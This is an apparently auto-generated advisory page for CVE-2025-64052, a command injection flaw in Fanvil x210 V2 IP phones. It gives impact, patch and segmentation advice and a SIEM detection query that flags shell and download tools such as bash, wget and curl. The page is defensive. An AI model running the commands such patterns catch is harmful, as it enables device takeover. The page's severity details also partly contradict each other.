CVE-2025-64052 – This vulnerability allows unauthenticated attac... (How to Fix)

Q: What is the severity of CVE-2025-64052?

CVE-2025-64052 has a CVSS score of 5.1 (MEDIUM). This vulnerability allows unauthenticated attackers on the same local network to execute arbitrary system commands on Fanvil x210 V2 IP phones. Attackers can gain full control of affected devices without needing credentials. Organizations using these phones in their networks are affected.

📋 TL;DR

This vulnerability allows unauthenticated attackers on the same local network to execute arbitrary system commands on Fanvil x210 V2 IP phones. Attackers can gain full control of affected devices without needing credentials. Organizations using these phones in their networks are affected.

💻 Affected Systems

Products:

Fanvil x210 V2 IP Phone

Versions: Version 2.12.20

Operating Systems: Embedded Linux-based phone OS

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects devices with firmware version 2.12.20. Earlier or later versions may not be vulnerable.

📦 What is this software?

X210 Firmware by Fanvil

View all CVEs affecting X210 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of IP phone allowing attackers to install persistent malware, intercept calls, pivot to other network devices, or use the device as a foothold for lateral movement.

🟠

Likely Case

Attackers execute commands to reconfigure the phone, intercept VoIP traffic, or use the device as a proxy for network attacks.

🟢

If Mitigated

Limited impact if phones are isolated in separate VLANs with strict network segmentation and access controls.

🌐 Internet-Facing: LOW (requires local network access, not directly exploitable from internet)

🏢 Internal Only: HIGH (exploitable by any device on the same local network without authentication)

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

GitHub advisory suggests exploit details are public. Attack requires only network access, no authentication needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: http://fanvil.com

Restart Required: Yes

Instructions:

1. Check Fanvil website for security updates. 2. Download latest firmware. 3. Upload to phone via web interface. 4. Reboot phone after update.

🔧 Temporary Workarounds

Network Segmentation

all

Isolate IP phones in separate VLAN with strict firewall rules

Access Control Lists

linux

Restrict network access to phone management interfaces

# Example: iptables -A INPUT -s 192.168.1.0/24 -p tcp --dport 80 -j ACCEPT
# iptables -A INPUT -p tcp --dport 80 -j DROP

🧯 If You Can't Patch

Segment phones into dedicated VLAN with no access to critical systems
Implement strict firewall rules blocking all unnecessary traffic to phone management interfaces

🔍 How to Verify

Check if Vulnerable:

Check phone firmware version via web interface (Settings > System > Status) for version 2.12.20

Check Version:

curl -s http://[phone-ip]/cgi-bin/getstatus.cgi | grep firmware

Verify Fix Applied:

Verify firmware version is updated to a version later than 2.12.20

📡 Detection & Monitoring

Log Indicators:

Unusual command execution in system logs
Multiple failed authentication attempts followed by successful access
Unexpected configuration changes

Network Indicators:

Unusual outbound connections from IP phones
Traffic to unexpected ports from phone management interface
HTTP requests with command injection patterns

SIEM Query:

source="phone_logs" AND ("cmd.exe" OR "bash" OR "/bin/sh" OR "wget" OR "curl")

📊 Metadata

CVE ID: CVE-2025-64052

CVSS v3 Score: 5.1 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CWE: CWE-77

EPSS Score: 0.08% exploit probability (24.1th percentile)

Published: December 5, 2025

Last Updated: December 31, 2025

🔗 References

http://fanvil.com Product
https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64052.md Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-64052, you might also want to check these: